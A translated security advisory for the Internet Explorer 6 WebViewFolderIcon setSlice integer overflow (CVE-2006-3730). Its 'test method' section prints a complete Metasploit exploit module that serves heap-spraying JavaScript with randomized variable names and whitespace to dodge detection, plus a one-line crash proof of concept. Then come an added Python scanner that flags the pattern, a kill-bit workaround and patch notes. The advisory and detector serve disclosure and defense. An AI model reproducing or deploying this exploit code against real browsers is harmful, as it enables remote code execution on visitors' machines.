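China Network Security Alliance  Source: Qiqu  Time: 2006-9-28 12:20:46
Published: 2006-07-17  Updated: 2006-09-28

Affected systems:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0

Description:
BUGTRAQ ID: 19030
CVE(CAN) ID: CVE-2006-3730

Internet Explorer is a very popular web browser published by Microsoft.

Internet Explorer has an integer overflow vulnerability in the way it handles malformed ActiveX object calls. A remote attacker may exploit this vulnerability to crash the browser or execute arbitrary instructions.

If an attacker can pass the argument 0x7fffffff to the setSlice method of the WebViewFolderIcon control, the browser may crash or execute arbitrary instructions.

<*Source: H D Moore (hdm@metasploit.com)
  Links: http://browserfun.blogspot.com/
         http://www.kb.cert.org/vuls/id/753044
         http://www.us-cert.gov/cas/techalerts/TA06-270A.html
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!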
require 'msf/core'

module Msf

class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote

    include Exploit::Remote::HttpServer::Html

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
            'Description'    => %q{
                This module exploits a flaw in the WebViewFolderIcon ActiveX control
                included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
                during the Month of Browser Bugs project (MoBB #18).
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'hdm',
                ],
            'Version'        => '$Revision: 3783 $',
            'References'     =>
                [
                    [ 'OSVDB', '27110' ],
                    [ 'BID', '19030' ],
                    [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
                ],
            'Payload'        =>
                {
                    'Space'    => 1024,
                    'BadChars' => "\x00",
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
                ],
            'DefaultTarget'  => 0))
    end

    def autofilter
        false
    end

    def on_request_uri(cli, request)

        # Re-generate the payload
        return if ((p = regenerate_payload(cli)) == nil)

        # Encode the shellcode
        shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

        # Get a unicode friendly version of the return address
        addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]

        # Randomize the javascript variable names
        var_buffer    = Rex::Text.rand_text_alpha(rand(30)+2)
        var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
        var_unescape  = Rex::Text.rand_text_alpha(rand(30)+2)
        var_x         = Rex::Text.rand_text_alpha(rand(30)+2)
        var_i         = Rex::Text.rand_text_alpha(rand(30)+2)
        var_tic       = Rex::Text.rand_text_alpha(rand(30)+2)
        var_toc       = Rex::Text.rand_text_alpha(rand(30)+2)

        # Randomize HTML data
        html          = Rex::Text.rand_text_alpha(rand(30)+2)

        # Build out the message
        content = %Q|
<html>
<head>
<script>
try {
    var #{var_unescape} = unescape ;
    var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
    var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
    while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ;

    var #{var_x} = new Array() ;
    for ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) {
        #{var_x}[ #{var_i} ] =
            #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +
            #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +
            #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +
            #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
    }

    for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) {
        var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
        try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { }
        var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
    }

} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
<body>
#{html}
</body>
</html>
|

        # Randomize the whitespace in the document
        content.gsub!(/\s+/) do |s|
            len = rand(100)+2
            set = "\x09\x20\x0d\x0a"
            buf = ''

            while (buf.length < len)
                buf << set[rand(set.length)].chr
            end

            buf
        end

        print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

        # Transmit the response to the client
        send_response(cli, content)
    end

end

end
===============================================
var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1'); a.setSlice(0x7fffffff, 0, 0x41424344, 0);
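
A static triage check for the pattern described above, as an added example that is not part of the original advisory or the Metasploit module: it flags script that calls setSlice with a very large first argument or scripts the WebViewFolderIcon control, and it tolerates the whitespace padding the module applies. The function names, severity labels, threshold and sample strings are assumptions constructed for illustration.

```python
import re

# Identifiers taken from the advisory text (compared in lower case).
PROGID = "webviewfoldericon.webviewfoldericon"
CLSID = "844f4806-e8a8-11d2-9652-00c04fc30871"
# Assumption: the smaller of the page's two values (0x7ffffffe, 0x7fffffff).
THRESHOLD = 0x7FFFFFFE

# ".setSlice( <first argument>", tolerant of padding and letter case.
SETSLICE = re.compile(r"\.\s*setSlice\s*\(\s*([^,)\s]+)", re.I)

# Constructed samples (not captured traffic).
SAMPLE_POC = ("var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1'); "
              "a.setSlice(0x7fffffff, 0, 0x41424344, 0);")
SAMPLE_PADDED = ("var q = new\tActiveXObject( 'webviewfoldericon.WEBVIEWFOLDERICON.1' );"
                 "\r\n q . setSlice(\n\t 0x7ffffffe ,0,0,0 );")
SAMPLE_OBJECT = ('<object id="o" classid="clsid:844F4806-E8A8-11D2-9652-00C04FC30871">'
                 "</object><script>o.setSlice(n, 0, 0, 0);</script>")
SAMPLE_BENIGN = "<script>var s = list.slice(0, 3);</script>"


def parse_int(token):
    """Parse a decimal or 0x-prefixed integer literal; None for anything else."""
    try:
        return int(token, 0)
    except ValueError:
        return None


def scan(html):
    """Return one finding per setSlice call worth a look in an HTML/JS document."""
    text = html.lower()
    references_control = PROGID in text or CLSID in text
    findings = []
    for m in SETSLICE.finditer(html):
        value = parse_int(m.group(1))
        if value is not None and value >= THRESHOLD:
            severity = "high" if references_control else "medium"
        elif references_control:
            severity = "low"  # control is scripted, argument is not a large literal
        else:
            continue  # some unrelated object's setSlice with a small argument
        findings.append({"offset": m.start(), "arg": m.group(1), "severity": severity})
    return findings


if __name__ == "__main__":
    for name in ("SAMPLE_POC", "SAMPLE_PADDED", "SAMPLE_OBJECT", "SAMPLE_BENIGN"):
        print(name, scan(globals()[name]))
```

Literal matching does not see through string concatenation or encoded script, so use this for triage alongside the kill bit workaround rather than in place of it.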
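
Recommendations:

Temporary workaround:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends that you take the following measures to reduce the threat:

* Disable the WebViewFolderIcon ActiveX control

Set the kill bit for the following CLSID to disable the WebViewFolderIcon control:

{844F4806-E8A8-11d2-9652-00C04FC30871}

Vendor patch:

Microsoft
---------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://www.microsoft.com/windows/ie/default.asp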